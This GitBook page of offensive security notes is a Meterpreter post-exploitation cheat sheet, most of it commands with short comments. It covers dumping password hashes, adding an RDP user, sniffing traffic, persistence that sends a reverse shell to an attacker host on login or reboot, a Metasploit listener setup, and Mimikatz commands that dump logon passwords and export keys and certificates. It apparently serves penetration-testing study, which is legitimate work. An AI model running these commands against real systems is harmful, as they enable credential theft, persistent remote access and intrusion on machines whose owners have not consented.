📑
Security Notes
  • Readme
  • Resources
    • Useful sites
    • Metasploit
      • Searchsploit
      • Msfvenom
      • Meterpreter
    • Shells
    • Linux
      • Cron
      • Connection
      • Compilers
    • Windows
      • Kernel exploits table
    • Bruteforce
      • Checklist
      • John the Ripper
      • Hashcat
    • BOF
      • Assembly
    • Gaining access checklist
  • Cloud - AWS
    • Enumeration
    • References
    • Bucket S3
      • Public Bucket
      • AMI Files
      • File upload to RCE
    • EC2
      • cloud-init Exploits
      • SSRF To AWS Role compromise
      • Unencrypted EBS
    • IAM
      • Account Disclosure by resource policy
    • Lambda Function
      • Code Injection
      • Attacking APIs
    • VPC
      • Expose Resources
  • Networking
    • Nmap
      • Scan types
    • TCPDump
    • Port forwarding
    • Ports
      • 21 - FTP
      • 22 - SSH
      • 25 465 587 - SMTP
      • 53 - DNS
      • 110 995 - POP3
      • 111 - NFS
      • 113 - Ident
      • 123 - NTP
      • 135 137 139 - RPC
      • 143 993 - IMAP
      • 161 - SNMP
      • 389 - LDAP
      • 139 445 - SMB
      • 873 - Rsync
      • 6379 - Redis
      • 6667 - IRC
  • Linux PrivEsc
    • Checklist
    • Enumeration
      • Important files
      • Memory Dump
    • Privileges Exploitation
    • Wildcard Exploits
    • Sudo Exploits
    • Docker Container
    • Docker Groups
    • Common Exploits
  • Windows PrivEsc
    • Checklist
    • Enumeration
      • Important Files
    • Antivirus evasion tools
    • Unquoted paths
    • Always install elevated
    • Vulnerable services
    • Client side
    • Exploitable privileges
      • Juicy Potato
    • UAC bypass
    • Common Exploits
  • Active Directory
    • Introduction
    • Checklist
    • Enumeration
    • Enable RDP
    • Kerberos
    • Rubeus
    • Credentials harvesting
      • Domain Controller specific
    • Connection
    • Pass The Hash
    • Kerberoast
    • ASREProast
    • Tickets
  • Web Attacks
    • Checklist
    • Enumeration
      • URL bruteforcing
    • APIs and Fields
    • Authentication
    • Filter Evasion
      • Fuzzying and encoding
    • File Vulnerabilities
      • LFI List
      • PHP shells
    • RCE
    • Code Injection
    • Dependency Injection
    • Joomla
    • Wordpress
    • WebDAV
    • HTTP
    • XSS
      • DOM Based
      • Reflected
      • Filter Evasion
    • SSI
    • SSTI
    • RCE
    • CSRF
    • SQL injection
      • sqlmap
      • PostgreSQL
      • Oracle
      • MSSQL
      • MySQL
      • Login
    • XPath injection
    • XXE
    • CORS
  • MOBILE PENTESTING
    • Static Code Analysis
    • Dynamic Code Analysis
    • Network Traffic Analysis
Powered by GitBook
On this page
  • Basic commands
  • Modules
  • Traffic capture
  • Persistence
  • Mimikatz
  1. Resources
  2. Metasploit

Meterpreter

Basic commands

These commands are the same both on Windows and *nix systems. File paths follow the *nix standard i.e./etc/passwdin windows it's necessary to escape the left dash i.e.c:\\program\ files\\test. If no path is specified most commands will default to local folder.

pwd
ls
ps
cd <path>                    
cat <file>
edit <file>
search -f <pattern> <path>
upload <filename> <path>
download <file path>
execute -f <path to executable>

getuid        #get hostname + current user
sysinfo       #get arch and OS info
ipconfig      #get net information
migrate       #inject execution to another running process
shell         #spawn a shell (cmd or /bin/bash)
getsystem     #attempt to elevate current user to NT AUTHORITY / SYSTEM
background    #background the shell and go back to msf interface
reboot        #restart the machine
exit          #close remote shell
sessions <id> #switch to another running shell

run hashdump                                #obtain password hashes from windows machine
run getgui -u <user> -p <pass>              #add and RDP-enabled user to current machine
run packetrecorder -li                      #list interfaces
run packetrecorder -i <int> -l <local path> #listen on specified interface and save capture file in given local path

Modules

Traffic capture

use sniffer                        #enable tool
sniffer_interfaces                 #list interfaces
sniffer_dump  <int> <file path>    #retrieve data from interface to file
sniffer_start <int>                #start capturing packets on given interface
sniffer_stats <int>                #show capture data on given interface
sniffer_stop  <int>                #stop capturing on given interface

Persistence

run persistence -U -i <timeout> -p <port> -r <host>    #sends a reverse shell at given host:port on user login
run persistence -X -i <timeout> -p <port> -r <host>    #sends a reverse shell at given host:port on machine reboot

Additional options

-A    #launch a multi/launcher to catch the connection
-L    #location to write the exploit to, default is %TEMP% will be used.
-P    #payload to use, default is windows/meterpreter/reverse_tcp.
-S    #start the agent on boot as a service (with SYSTEM privileges)
-T    #executable to use instead of a payload

Manual msf listener launch

use exploit/multi/handler
set PAYLOAD <payload>
set LHOST <local ip>
set LPORT <port>
exploit

Mimikatz

load mimikatz                                   #launch with interactive mode
mimikatz_command -f sekurlsa::logonpasswords    #dump all passwords
mimikatz_command -f handle::list                #list services
mimikatz_command -f handle::tokenImpersonate    #impersonate service

Services

mimikatz_command -f service::list
mimikatz_command -f service::start
mimikatz_command -f service::stop

Certificates

mimikatz_command -f crypto::listProviders
mimikatz_command -f crypto::listKeys
mimikatz_command -f crypto::listCertificates
mimikatz_command -f crypto::exportCertificates
mimikatz_command -f crypto::exportKeys
PreviousMsfvenomNextShells

Last updated 4 years ago